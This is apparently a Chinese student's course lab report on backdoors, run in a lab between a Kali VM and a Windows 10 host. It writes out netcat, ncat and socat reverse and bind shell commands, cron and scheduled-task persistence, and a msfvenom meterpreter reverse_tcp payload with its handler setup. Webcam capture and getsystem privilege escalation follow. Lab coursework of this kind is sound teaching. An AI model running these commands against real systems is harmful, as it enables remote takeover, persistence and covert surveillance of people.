2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

1、实践目标

• 使用netcat获取主机操做Shell，cron启动
• 使用socat获取主机操做Shell, 任务计划启动
• 使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
• 使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

---

2、基础知识

• Kali地址：192.168.153.134
  

• Win10地址：169.254.0.178
  

• 保证能ping通：
  

• 关闭防火墙和杀毒软件

---

3、Exp2.1 使用ncat，本机（Windows）得到虚拟机（Linux）操做shell

实验步骤：

• win10中使用ncat监听5237端口

ncat.exe -l -p 5237

• 在Linux输入指令
  

nc 192.168.153.134 -e /bin/sh

反弹链接Windows主机的 5237 端口

• 攻击成功：Win10成功得到Kali操做shell，可以进行操做
  

• 相同道理：在Linux中监听5237端口

• 在Windows输入指令

ncat.exe  -e cmd.exe 192.168.153.134 5237

反弹链接Linux的5237端口

• 攻击成功：
  

---

4、Exp2.2使用netcat获取主机操做Shell，cron启动

实验原理

• cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程，与windows下的计划任务相似，当安装完成操做系统后，默认会安装此服务 工具，而且会自动启动cron进程，cron进程每分钟会按期检查是否有要执行的任务，若是有要执行的任务，则自动执行该任务。

  实验步骤

• 用 crontab -e 指令编辑定时任务，选择3
  

• vim编辑器中用 i 改成插入模式，在最后一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 后输入 :wq! 保存并退出
  

• 成功显示ls：
  

---

5、Exp2.3使用socat获取主机操做Shell, 任务计划启动

实验步骤

• win中打开控制面板，选中管理工具->任务计划程序

• 建立新任务，填写任务名称，新建一个触发器。
  

• 同时建立新操做，在操做->程序或脚本中选择 socat.exe 文件的路径，在添加参数一栏填写 tcp-listen:5237 exec:cmd.exe,pty,stderr
  

• 按快捷键win+L即能锁定计算机，建立的任务开始运行。

• 此时在Linux中输入指令 socat - tcp:192.168.153.134 5237 ，发现成功得到了cmd shell，可以输入Windows的命令（这里由于当时保存截图的时候覆盖了，后来写博客才发现少了这张截图。。不过真的成功了！）

  6、Exp2.4使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

  实验步骤

• Linux中输入指令生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe

• 在Linux中输入指令msfconsole，进入msf命令行，msf启动监听前须要进行一些设置

use exploit/multi/handler    /*进入handler模式*/

set payload windows/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.153.134  /*设置LHOST，其中ip为Linux的ip*/

set LPORT 5237 /*设置LPORT*/

exploit /*启动监听*/

• 启动监听后再在win中运行后门程序，此时Linux上已经得到了Windows主机的链接，而且获得了远程控制的shell，可以输入Windows中的命令。
  

---

7、Exp2.5使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

实验步骤

• 获取摄像头和录像：

webcam_snap / webcam_stream

• 获取运行msf会话的用户名，从而查看当前会话具备的权限;提高管理员权限（此时好像已经最高权限了）

getuid

get system

---

8、实验感想与问题

• 感想：此次实验，不得不说很让我震惊。这是我第一次实际上get到后门获取信息的知识，很知足。但愿之后可以更深刻的学到相关理论和知识，不只学会攻击，也要学会防范。

• 例举你能想到的一个后门进入到你系统中的可能方式？

答：

• 例举你知道的后门如何启动起来(win及linux)的方式？

答：在下载软件的时候，可能会有捆绑垃圾下载下来，而后修改开机的启动项，当攻击者输入命令时，本机可能会自动响应。

• Meterpreter有哪些给你映像深入的功能？

答：我以为最深入的就是录像和音频的获取（这不就是黑客监视么！！）我已经将笔记本的摄像头贴起来了。

• 如何发现本身有系统有没有被安装后门？

答：360安全卫士或许是个很好的选择；不过若是真正想要发现后门程序，我以为要用抓包技术来分析信息。